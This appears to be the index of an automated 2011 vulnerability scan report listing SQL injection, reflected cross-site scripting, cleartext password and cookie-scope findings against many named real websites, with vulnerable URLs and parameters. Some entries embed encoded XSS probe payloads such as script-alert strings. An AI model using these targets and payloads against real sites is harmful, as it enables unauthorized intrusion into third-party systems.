CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Fri Apr 01 13:25:59 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. SQL injection

1.1. http://politicalwire.com/favicon.ico [REST URL parameter 1]

1.2. http://www.cambridge.org/favicon.ico [REST URL parameter 1]

1.3. http://www.dogpile.com/dogpile_other/ws/index [Referer HTTP header]

1.4. http://www.dogpile.com/dogpile_other/ws/index [wsViewRecent cookie]

2. Cross-site scripting (reflected)

2.1. http://a.collective-media.net/adj/ns.androidtapp/general [REST URL parameter 2]

2.2. http://a.collective-media.net/adj/ns.androidtapp/general [REST URL parameter 3]

2.3. http://a.collective-media.net/adj/ns.androidtapp/general [name of an arbitrarily supplied request parameter]

2.4. http://a.collective-media.net/adj/ns.androidtapp/general [ppos parameter]

2.5. http://a.collective-media.net/cmadj/ns.androidtapp/general [REST URL parameter 1]

2.6. http://a.collective-media.net/cmadj/ns.androidtapp/general [REST URL parameter 2]

2.7. http://a.collective-media.net/cmadj/ns.androidtapp/general [REST URL parameter 3]

2.8. http://a.collective-media.net/cmadj/ns.androidtapp/general [ppos parameter]

2.9. http://ads.adxpose.com/ads/ads.js [uid parameter]

2.10. http://api.ipinfodb.com/v2/ip_query_country.php [callback parameter]

2.11. http://api.ipinfodb.com/v2/ip_query_country.php [name of an arbitrarily supplied request parameter]

2.12. http://b.scorecardresearch.com/beacon.js [c1 parameter]

2.13. http://b.scorecardresearch.com/beacon.js [c15 parameter]

2.14. http://b.scorecardresearch.com/beacon.js [c2 parameter]

2.15. http://b.scorecardresearch.com/beacon.js [c3 parameter]

2.16. http://b.scorecardresearch.com/beacon.js [c4 parameter]

2.17. http://b.scorecardresearch.com/beacon.js [c5 parameter]

2.18. http://b.scorecardresearch.com/beacon.js [c6 parameter]

2.19. http://event.adxpose.com/event.flow [uid parameter]

2.20. http://ib.adnxs.com/ab [cnd parameter]

2.21. http://manhattan.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 1]

2.22. http://manhattan.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 2]

2.23. http://manhattan.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 3]

2.24. http://manhattan.ny1.com/Content/ServeContent.aspx [REST URL parameter 1]

2.25. http://manhattan.ny1.com/Content/ServeContent.aspx [REST URL parameter 2]

2.26. http://manhattan.ny1.com/Content/ServeResource.aspx [REST URL parameter 1]

2.27. http://manhattan.ny1.com/Content/ServeResource.aspx [REST URL parameter 2]

2.28. http://manhattan.ny1.com/content/top_stories/ [REST URL parameter 1]

2.29. http://manhattan.ny1.com/content/top_stories/ [REST URL parameter 2]

2.30. http://manhattan.ny1.com/content/top_stories/ [name of an arbitrarily supplied request parameter]

2.31. http://pixel.fetchback.com/serve/fb/pdc [name parameter]

2.32. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]

2.33. http://suggest.infospace.com/QuerySuggest/SuggestServlet [reqID parameter]

2.34. http://view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

2.35. http://view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

2.36. http://view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

2.37. http://view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

2.38. http://view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

2.39. http://view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

2.40. http://view.c3metrics.com/v.js [cid parameter]

2.41. http://view.c3metrics.com/v.js [id parameter]

2.42. http://view.c3metrics.com/v.js [t parameter]

2.43. http://www.aeriagames.com/favicon.ico [REST URL parameter 1]

2.44. http://www.aeriagames.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.45. http://www.aeriagames.com/meebo.html [REST URL parameter 1]

2.46. http://www.aeriagames.com/themes/main/favicon.ico [REST URL parameter 3]

2.47. http://www.aeriagames.com/themes/main/favicon.ico [name of an arbitrarily supplied request parameter]

2.48. http://www.androidtapp.com/favicon.ico [REST URL parameter 1]

2.49. http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49 [REST URL parameter 1]

2.50. http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49 [REST URL parameter 2]

2.51. http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49 [name of an arbitrarily supplied request parameter]

2.52. http://www.androidtapp.com/wp-admin/css/colors-fresh.css [REST URL parameter 1]

2.53. http://www.androidtapp.com/wp-admin/css/colors-fresh.css [REST URL parameter 2]

2.54. http://www.androidtapp.com/wp-admin/css/colors-fresh.css [REST URL parameter 3]

2.55. http://www.androidtapp.com/wp-admin/css/login.css [REST URL parameter 1]

2.56. http://www.androidtapp.com/wp-admin/css/login.css [REST URL parameter 2]

2.57. http://www.androidtapp.com/wp-admin/css/login.css [REST URL parameter 3]

2.58. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 1]

2.59. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 2]

2.60. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 3]

2.61. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 4]

2.62. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 1]

2.63. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 2]

2.64. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 3]

2.65. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 4]

2.66. http://www.androidtapp.com/wp-content/plugins/wp-postratings/postratings-js.js [REST URL parameter 1]

2.67. http://www.androidtapp.com/wp-content/plugins/wp-postratings/postratings-js.js [REST URL parameter 2]

2.68. http://www.androidtapp.com/wp-content/plugins/wp-postratings/postratings-js.js [REST URL parameter 3]

2.69. http://www.androidtapp.com/wp-content/plugins/wp-postratings/postratings-js.js [REST URL parameter 4]

2.70. http://www.androidtapp.com/wp-content/themes/AndroidTappv3/favicon.ico [REST URL parameter 1]

2.71. http://www.androidtapp.com/wp-content/themes/AndroidTappv3/favicon.ico [REST URL parameter 2]

2.72. http://www.androidtapp.com/wp-content/themes/AndroidTappv3/favicon.ico [REST URL parameter 3]

2.73. http://www.androidtapp.com/wp-content/themes/AndroidTappv3/favicon.ico [REST URL parameter 4]

2.74. http://www.androidtapp.com/wp-includes/js/jquery/jquery.js [REST URL parameter 1]

2.75. http://www.androidtapp.com/wp-includes/js/jquery/jquery.js [REST URL parameter 2]

2.76. http://www.androidtapp.com/wp-includes/js/jquery/jquery.js [REST URL parameter 3]

2.77. http://www.androidtapp.com/wp-includes/js/jquery/jquery.js [REST URL parameter 4]

2.78. http://www.androidtapp.com/wp-login.php [REST URL parameter 1]

2.79. http://www.autobytel.com/favicon.ico [REST URL parameter 1]

2.80. http://www.beatthetraffic.com/widgets/traveltimes.aspx [partner parameter]

2.81. http://www.cambridge.org/favicon.ico [REST URL parameter 1]

2.82. http://www.cambridge.org/uk/404_error.asp [REST URL parameter 2]

2.83. http://www.cambridge.org/uk/404_error.asp [error parameter]

2.84. http://www.cambridge.org/uk/catalogue/images/ecomm_logo.gif [REST URL parameter 2]

2.85. http://www.cambridge.org/uk/catalogue/images/ecomm_logo.gif [REST URL parameter 3]

2.86. http://www.cambridge.org/uk/catalogue/images/ecomm_logo.gif [REST URL parameter 4]

2.87. http://www.cambridge.org/uk/catalogue/images/ecomm_logo.gif [name of an arbitrarily supplied request parameter]

2.88. http://www.cambridge.org/uk/catalogue/viewBasket.asp [REST URL parameter 2]

2.89. http://www.cambridge.org/uk/catalogue/viewBasket.asp [REST URL parameter 3]

2.90. http://www.dmvnow.com/favicon.ico [REST URL parameter 1]

2.91. http://www.dogpile.com/dogpile/ws/redir/_iceUrlFlag=11 [qcat parameter]

2.92. http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11 [icePage%24SearchBoxTop%24qcat parameter]

2.93. http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11 [icePage%24SearchBoxTop%24qcat parameter]

2.94. http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11 [qcat parameter]

2.95. http://www.dogpile.com/dogpile_rss/ws/redir/_iceUrlFlag=11 [qcat parameter]

2.96. http://www.dogpile.com/dogpile_rss/ws/redir/_iceUrlFlag=11 [qcat parameter]

2.97. http://www.dogpile.com/dogpile_rss/ws/redir/_iceUrlFlag=11 [qcat parameter]

2.98. http://www.kicksonfire.com/favicon.ico [REST URL parameter 1]

2.99. http://www.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 1]

2.100. http://www.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 2]

2.101. http://www.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 3]

2.102. http://www.ny1.com/Content/ServeContent.aspx [REST URL parameter 1]

2.103. http://www.ny1.com/Content/ServeContent.aspx [REST URL parameter 2]

2.104. http://www.ny1.com/Content/ServeResource.aspx [REST URL parameter 1]

2.105. http://www.ny1.com/Content/ServeResource.aspx [REST URL parameter 2]

2.106. http://www.ny1.com/favicon.ico [80003'-alert(1)-'46fe3f653ad parameter]

2.107. http://www.ny1.com/favicon.ico [REST URL parameter 1]

2.108. http://www.ny1.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.109. http://www.ottawacitizen.com/favicon.ico [REST URL parameter 1]

2.110. http://www.quickyellow.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.111. http://www.swiftpage1.com/favicon.ico [REST URL parameter 1]

2.112. http://www.swiftpage1.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.113. http://www.viagra.com/favicon.ico [REST URL parameter 1]

2.114. http://www.viagra.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.115. http://community.dogpile.com/ [User-Agent HTTP header]

2.116. http://support.dogpile.com/pressroom/ [User-Agent HTTP header]

2.117. http://www.blacksingles.com/favicon.ico [Referer HTTP header]

2.118. http://www.palomar.edu/favicon.ico [Referer HTTP header]

2.119. http://www.palomar.edu/favicon.ico [User-Agent HTTP header]

2.120. http://a.collective-media.net/cmadj/ns.androidtapp/general [cli cookie]

2.121. http://dogpile.com/dogpile/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11 [DomainSession cookie]

2.122. http://view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

2.123. http://www.8tracks.com/favicon.ico [REST URL parameter 1]

2.124. http://www.8tracks.com/favicon.ico [REST URL parameter 1]

2.125. http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11 [DomainSession cookie]

2.126. http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11 [DomainSession cookie]

2.127. http://www.dogpile.com/dogpile/ws/contactUs/rfcid=1293/rfcp=left/_iceUrlFlag=11 [DomainSession cookie]

2.128. http://www.dogpile.com/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11 [DomainSession cookie]

2.129. http://www.dogpile.com/dogpile/ws/results/Web/april%20fools%20day%20pranks/1/42/Seasonal/Relevance/ [DomainSession cookie]

2.130. http://www.dogpile.com/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11 [DomainSession cookie]

2.131. http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11 [DomainSession cookie]

2.132. http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11 [DomainSession cookie]

2.133. http://www.dogpile.com/dogpile_other/ws/index [DomainSession cookie]

2.134. http://www.dogpile.com/dogpile_other/ws/index [DomainSession cookie]

2.135. http://www.dogpile.com/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11 [DomainSession cookie]

2.136. http://www.dogpile.com/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11 [DomainSession cookie]

2.137. http://www.dogpile.com/dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11 [DomainSession cookie]

2.138. http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11 [DomainSession cookie]

2.139. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Dark%20Sites/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11 [DomainSession cookie]

2.140. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Review%20Sites/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11 [DomainSession cookie]

2.141. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Submit%20Site/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11 [DomainSession cookie]

2.142. http://www.dogpile.com/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7 [DomainSession cookie]

2.143. http://www.dogpile.com/dogpile_rss/web/GE+Zero+Taxes [DomainSession cookie]

2.144. http://www.dogpile.com/dogpile_rss/web/Go+Daddy+CEO+Elephant [DomainSession cookie]

2.145. http://www.dogpile.com/dogpile_rss/ws/about/_iceUrlFlag=11 [DomainSession cookie]

2.146. http://www.dogpile.com/dogpile_rss/ws/faq/_iceUrlFlag=11 [DomainSession cookie]

2.147. http://www.dogpile.com/dogpile_rss/ws/index/ [DomainSession cookie]

2.148. http://www.dogpile.com/favicon.ico [DomainSession cookie]

2.149. http://www.dogpile.com/info.dogpl.rss/Web6c5ea//' [DomainSession cookie]

2.150. http://www.dogpile.com/info.dogpl.rss/web/GE+Zero+Taxes [DomainSession cookie]

2.151. http://www.dogpile.com/info.dogpl.rss/web/Go+Daddy+CEO+Elephant [DomainSession cookie]

2.152. http://www.dogpile.com/info.dogpl.rss/web/MLB+Schedule [DomainSession cookie]

2.153. http://www.force.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.154. http://www.force.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.155. http://www.mercantila.com/website/shoppingcart/cartbroker.php [merc_uid cookie]

2.156. http://www.mrnumber.com/favicon.ico [REST URL parameter 1]

2.157. http://www.mrnumber.com/favicon.ico [REST URL parameter 1]

2.158. http://www.mrnumber.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.159. http://www.mrnumber.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.160. http://www.opinionoutpost.com/favicon.ico [REST URL parameter 1]

2.161. http://www.opinionoutpost.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.162. http://www.rateyourmusic.com/favicon.ico [REST URL parameter 1]

2.163. http://www.rateyourmusic.com/favicon.ico [name of an arbitrarily supplied request parameter]

3. Cleartext submission of password

3.1. http://ecards.myfuncards.com/myfuncards/404

3.2. http://www.androidtapp.com/wp-login.php

4. Session token in URL

5. ASP.NET ViewState without MAC enabled

5.1. http://www.maybenow.com/favicon.ico

5.2. http://www.nabiscoworld.com/favicon.ico

6. Cookie scoped to parent domain

6.1. http://www.888.com/favicon.ico

6.2. http://www.dogpile.com/

6.3. http://www.dogpile.com/clickcallbackserver/_iceUrlFlag=1

6.4. http://www.dogpile.com/clickserver/_iceUrlFlag=1

6.5. http://www.dogpile.com/dogpile/ws/about/

6.6. http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11

6.7. http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11

6.8. http://www.dogpile.com/dogpile/ws/contactUs/rfcid=1293/rfcp=left/_iceUrlFlag=11

6.9. http://www.dogpile.com/dogpile/ws/faq/

6.10. http://www.dogpile.com/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11

6.11. http://www.dogpile.com/dogpile/ws/redir/_iceUrlFlag=11

6.12. http://www.dogpile.com/dogpile/ws/results/Web/april%20fools%20day%20pranks/1/42/Seasonal/Relevance/

6.13. http://www.dogpile.com/dogpile_other/ws/about/_iceUrlFlag=11

6.14. http://www.dogpile.com/dogpile_other/ws/about/rfcid=1245/rfcp=left/_iceUrlFlag=11

6.15. http://www.dogpile.com/dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11

6.16. http://www.dogpile.com/dogpile_other/ws/aboutresults/rfcid=1386/rfcp=left/_iceUrlFlag=11

6.17. http://www.dogpile.com/dogpile_other/ws/bookmark/bwr=ffchrm/_iceUrlFlag=11

6.18. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Images/_iceUrlFlag=11

6.19. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=News/_iceUrlFlag=11

6.20. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Video/_iceUrlFlag=11

6.21. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11

6.22. http://www.dogpile.com/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11

6.23. http://www.dogpile.com/dogpile_other/ws/categories/_iceUrlFlag=11

6.24. http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11

6.25. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11

6.26. http://www.dogpile.com/dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11

6.27. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11

6.28. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11

6.29. http://www.dogpile.com/dogpile_other/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11

6.30. http://www.dogpile.com/dogpile_other/ws/index

6.31. http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11

6.32. http://www.dogpile.com/dogpile_other/ws/index/qcat=Images/_iceUrlFlag=11

6.33. http://www.dogpile.com/dogpile_other/ws/index/qcat=News/_iceUrlFlag=11

6.34. http://www.dogpile.com/dogpile_other/ws/index/qcat=Video/_iceUrlFlag=11

6.35. http://www.dogpile.com/dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11

6.36. http://www.dogpile.com/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11

6.37. http://www.dogpile.com/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11

6.38. http://www.dogpile.com/dogpile_other/ws/metasearch/rfcid=1384/rfcp=left/_iceUrlFlag=11

6.39. http://www.dogpile.com/dogpile_other/ws/offsite-forms/rfcid=1219/rfcp=quickstart-3/_iceUrlFlag=11

6.40. http://www.dogpile.com/dogpile_other/ws/preferences/_iceUrlFlag=11

6.41. http://www.dogpile.com/dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

6.42. http://www.dogpile.com/dogpile_other/ws/privacy/_iceUrlFlag=11

6.43. http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11

6.44. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Dark%20Sites/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11

6.45. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Review%20Sites/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11

6.46. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Submit%20Site/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11

6.47. http://www.dogpile.com/dogpile_other/ws/redir/qkw=horoscope/rfcid=4400/rfcp=quickstart-6/qlnk=1/_iceUrlFlag=11

6.48. http://www.dogpile.com/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7

6.49. http://www.dogpile.com/dogpile_other/ws/termsofuse/_iceUrlFlag=11

6.50. http://www.dogpile.com/dogpile_other/ws/tips/_iceUrlFlag=11

6.51. http://www.dogpile.com/dogpile_prefer/ws/redir/_iceUrlFlag=11

6.52. http://www.dogpile.com/dogpile_rss/web/GE+Zero+Taxes

6.53. http://www.dogpile.com/dogpile_rss/web/Go+Daddy+CEO+Elephant

6.54. http://www.dogpile.com/dogpile_rss/web/MLB+Schedule

6.55. http://www.dogpile.com/dogpile_rss/ws/about/_iceUrlFlag=11

6.56. http://www.dogpile.com/dogpile_rss/ws/aboutresults/_iceUrlFlag=11

6.57. http://www.dogpile.com/dogpile_rss/ws/faq/_iceUrlFlag=11

6.58. http://www.dogpile.com/dogpile_rss/ws/ie8upgradelearnmore/rfcid=978/rfcp=TopNavigation/_iceUrlFlag=11

6.59. http://www.dogpile.com/dogpile_rss/ws/index/

6.60. http://www.dogpile.com/dogpile_rss/ws/index/_iceUrlFlag=11

6.61. http://www.dogpile.com/dogpile_rss/ws/index/qcat=wp/_iceUrlFlag=11

6.62. http://www.dogpile.com/dogpile_rss/ws/index/qcat=yp/_iceUrlFlag=11

6.63. http://www.dogpile.com/dogpile_rss/ws/preferences/_iceUrlFlag=11

6.64. http://www.dogpile.com/dogpile_rss/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

6.65. http://www.dogpile.com/dogpile_rss/ws/privacy/_iceUrlFlag=11

6.66. http://www.dogpile.com/dogpile_rss/ws/redir/_iceUrlFlag=11

6.67. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Bowl/qlnk=1/rfcp=RightNav/rfcid=302361/_iceUrlFlag=11

6.68. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Com/qlnk=1/rfcp=RightNav/rfcid=302363/_iceUrlFlag=11

6.69. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Email%20Login/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11

6.70. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Email/qlnk=1/rfcp=RightNav/rfcid=302364/_iceUrlFlag=11

6.71. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Log%20In/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11

6.72. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Video/qlnk=1/rfcp=RightNav/rfcid=302359/_iceUrlFlag=11

6.73. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Videos%20Full/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11

6.74. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy/qlnk=1/rfcp=RightNav/rfcid=302358/_iceUrlFlag=11

6.75. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=MLB%20Schedule/adv=/rfcp=RightNav/rfcid=107/_iceUrlFlag=11

6.76. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%202010%20Schedule/qlnk=1/rfcp=RightNav/rfcid=302363/_iceUrlFlag=11

6.77. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Baseball%20Schedules/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11

6.78. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Network%201!2F1!2F09%20Schedule/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11

6.79. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Network%20Schedule/qlnk=1/rfcp=RightNav/rfcid=302364/_iceUrlFlag=11

6.80. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Rumors/qlnk=1/rfcp=RightNav/rfcid=302358/_iceUrlFlag=11

6.81. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Scores/qlnk=1/rfcp=RightNav/rfcid=302359/_iceUrlFlag=11

6.82. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Standings/qlnk=1/rfcp=RightNav/rfcid=302361/_iceUrlFlag=11

6.83. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Trade%20Rumors/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11

6.84. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=web/qkw=Go%20Daddy%20CEO%20Elephant/newtxn=false/rfcid=393/rfcp=TopNavigation/_iceUrlFlag=11

6.85. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=web/qkw=MLB%20Schedule/newtxn=false/rfcid=393/rfcp=TopNavigation/_iceUrlFlag=11

6.86. http://www.dogpile.com/dogpile_rss/ws/termsofuse/_iceUrlFlag=11

6.87. http://a.collective-media.net/adj/ns.androidtapp/general

6.88. http://ad.amgdgt.com/ads/

6.89. http://b.scorecardresearch.com/b

6.90. http://b.scorecardresearch.com/p

6.91. http://bh.contextweb.com/bh/set.aspx

6.92. http://cf.addthis.com/red/p.json

6.93. http://ib.adnxs.com/ab

6.94. http://leadback.advertising.com/adcedge/lb

6.95. http://m.adnxs.com/msftcookiehandler

6.96. http://pixel.33across.com/ps/

6.97. http://pixel.fetchback.com/serve/fb/pdc

6.98. http://pixel.quantserve.com/pixel

6.99. http://r1-ads.ace.advertising.com/site=775632/size=300250/u=2/bnum=15423922/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=3/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

6.100. http://r1-ads.ace.advertising.com/site=775632/size=300250/u=2/bnum=75921501/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=3/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

6.101. http://r1-ads.ace.advertising.com/site=775633/size=728090/u=2/bnum=34648487/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

6.102. http://r1-ads.ace.advertising.com/site=775633/size=728090/u=2/bnum=81095569/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

6.103. http://r1-ads.ace.advertising.com/site=775634/size=160600/u=2/bnum=50393661/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=4/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

6.104. http://r1-ads.ace.advertising.com/site=775634/size=160600/u=2/bnum=54361916/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=4/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

6.105. http://r1-ads.ace.advertising.com/site=782463/size=160600/u=2/bnum=47025873/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=5/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

6.106. http://r1-ads.ace.advertising.com/site=782463/size=160600/u=2/bnum=70936362/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=5/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

6.107. http://r1-ads.ace.advertising.com/site=782464/size=300250/u=2/bnum=21125090/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

6.108. http://r1-ads.ace.advertising.com/site=782464/size=300250/u=2/bnum=83041319/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

6.109. http://safebrowsing.clients.google.com/safebrowsing/downloads

6.110. http://syndication.mmismm.com/tntwo.php

6.111. http://tags.bluekai.com/site/2045

6.112. http://tags.bluekai.com/site/2731

6.113. http://view.c3metrics.com/c3VTabstrct-6-2.php

6.114. http://www.amway.com/favicon.ico

6.115. http://www.bbpeoplemeet.com/favicon.ico

6.116. http://www.belkin.com/favicon.ico

6.117. http://www.jpcycles.com/favicon.ico

6.118. http://www.loveandseek.com/favicon.ico

6.119. http://www.mercantila-checkout.com/setcookie.js

6.120. http://www.progressiveagent.com/favicon.ico

6.121. http://www.rambler.ru/favicon.ico

6.122. http://www.wpbf.com/favicon.ico

7. Cookie without HttpOnly flag set

7.1. http://ads.adxpose.com/ads/ads.js

